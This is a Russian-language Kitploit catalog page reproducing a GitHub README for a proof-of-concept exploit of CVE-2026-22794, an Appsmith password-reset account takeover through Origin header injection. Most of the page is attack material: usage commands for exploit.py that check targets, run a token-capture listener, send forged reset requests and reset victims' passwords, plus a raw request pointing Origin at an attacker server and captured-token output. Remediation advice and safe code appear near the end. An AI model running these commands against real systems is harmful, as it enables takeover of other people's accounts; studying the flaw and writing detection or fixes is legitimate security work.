Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22794-POC — 🔴 CVE-2026-22794 — Перехват аккаунта при сбросе пароля Appsmith через инъекцию заголовка Origin | PoC-эксплойт + шаблон Nuclei | Kitploit
Инструменты/GitHubGitHub/malikhamza7/cve-2026-22794-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеАутентификация
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 — Перехват аккаунта при сбросе пароля Appsmith через инъекцию заголовка Origin | PoC-эксплойт + шаблон Nuclei

Репозиторий
787 месяцев назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-22794 - Внедрение заголовка Origin в Appsmith

Python Version CVE License

🔴 Критическая уязвимость безопасности

Перехват ссылки сброса пароля через манипуляцию заголовком Origin

Этот репозиторий содержит Proof of Concept (PoC) эксплойт для CVE-2026-22794 — критической уязвимости в Appsmith, которая позволяет злоумышленникам перехватывать токены сброса пароля и получать полный контроль над учётной записью.

📋 Сводка уязвимости

ПолеЗначение
CVE IDCVE-2026-22794
Затронутое ПОAppsmith (версии до исправления)
Тип уязвимостиВнедрение заголовка Origin
ВоздействиеПолный захват учётной записи
Оценка CVSS9.1 (Критическая)
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииНет
Взаимодействие с пользователемТребуется (жертва переходит по ссылке)

🎯 Описание уязвимости

Appsmith использует HTTP-заголовок Origin без проверки для формирования URL-адресов сброса пароля и подтверждения электронной почты. Уязвимый код напрямую присваивает заголовок Origin базовому URL сброса пароля:

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

Это позволяет злоумышленнику:

  1. Инициировать сброс пароля для любого адреса электронной почты
  2. Внедрить вредоносный заголовок Origin, указывающий на сервер злоумышленника
  3. Перехватить токен сброса пароля, когда жертва переходит по ссылке
  4. Использовать токен для сброса пароля жертвы и захвата её учётной записи

🔥 Цепочка атаки

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     ПОТОК АТАКИ                                  │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ЗЛОУМЫШЛЕН-│                    │ APPSMITH │                    │  ЖЕРТВА  │
  │   НИК    │                    └────┬─────┘                    └────┬─────┘
  └────┬─────┘                               │                               │
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. Отправка письма с          │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. Жертва переходит по ссылке │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. Токен перехвачен!          │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. ЗАХВАТ УЧЁТНОЙ ЗАПИСИ! ✓   │                               │
       │                               │                               │

📦 Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# Установка зависимостей
pip install -r requirements.txt

🚀 Использование

Проверка уязвимости цели

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

Запуск сервера перехвата токенов

root@kitploit:~
python exploit.py --listen --port 8080

Отправка вредоносного запроса сброса пароля

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

Полностью автоматизированная атака

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

Использование перехваченного токена для сброса пароля

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 Демонстрация атаки

Шаг 1: Злоумышленник отправляет вредоносный запрос

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

Шаг 2: Жертва получает письмо с вредоносной ссылкой

root@kitploit:~
Ссылка для сброса пароля: https://attacker-server.com/user/resetPassword?token=abc123xyz...

Шаг 3: Злоумышленник перехватывает токен

root@kitploit:~
[+] ВХОДЯЩИЙ ЗАПРОС ПЕРЕХВАЧЕН!
[*] Путь: /user/resetPassword?token=abc123xyz789...
[!!!] ТОКЕН СБРОСА ПАРОЛЯ ПЕРЕХВАЧЕН!
[!!!] Токен: abc123xyz789...

Шаг 4: Захват учётной записи

root@kitploit:~
[+] ЗАХВАТ УЧЁТНОЙ ЗАПИСИ УСПЕШЕН!
[+] Пароль был сброшен на: NewP@ssw0rd!

🛡️ Устранение уязвимости

Организации, использующие Appsmith, должны:

  1. Немедленно обновиться до последней исправленной версии
  2. Проверять заголовки Origin по белому списку разрешённых доменов
  3. Использовать серверную конфигурацию для генерации URL-адресов сброса пароля
  4. Внедрить дополнительную проверку (например, проверку IP-адреса, короткий срок действия токена)

Пример безопасного кода

root@kitploit:~
// ❌ УЯЗВИМЫЙ КОД
userPasswordDTO.setBaseUrl(originHeader);

// ✅ БЕЗОПАСНЫЙ КОД
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// Или проверка по белому списку
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Invalid origin header");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 Структура репозитория

root@kitploit:~
CVE-2026-22794/
├── README.md           # Этот файл
├── exploit.py          # Основной скрипт эксплойта
├── requirements.txt    # Зависимости Python
├── LICENSE             # Лицензия MIT
└── docs/
    └── technical_analysis.md  # Подробный анализ уязвимости

⚠️ Правовое предупреждение

Этот инструмент предоставляется только для авторизованного тестирования безопасности и образовательных целей.

  • Используйте этот инструмент только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение
  • Несанкционированный доступ к компьютерным системам является незаконным
  • Автор не несёт ответственности за любое неправомерное использование этого инструмента
  • Всегда соблюдайте практики ответственного раскрытия уязвимостей

📄 Ссылки

  • CVE-2026-22794
  • OWASP - Шпаргалка по восстановлению забытого пароля
  • CWE-346: Ошибка проверки Origin

👤 Автор

Исследователь безопасности

  • GitHub: @MalikHamza7
  • LinkedIn: Ваш профиль LinkedIn

📜 Лицензия

Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.


⭐ Если вы нашли это полезным, пожалуйста, поставьте звёздочку репозиторию! ⭐

Скачать инструмент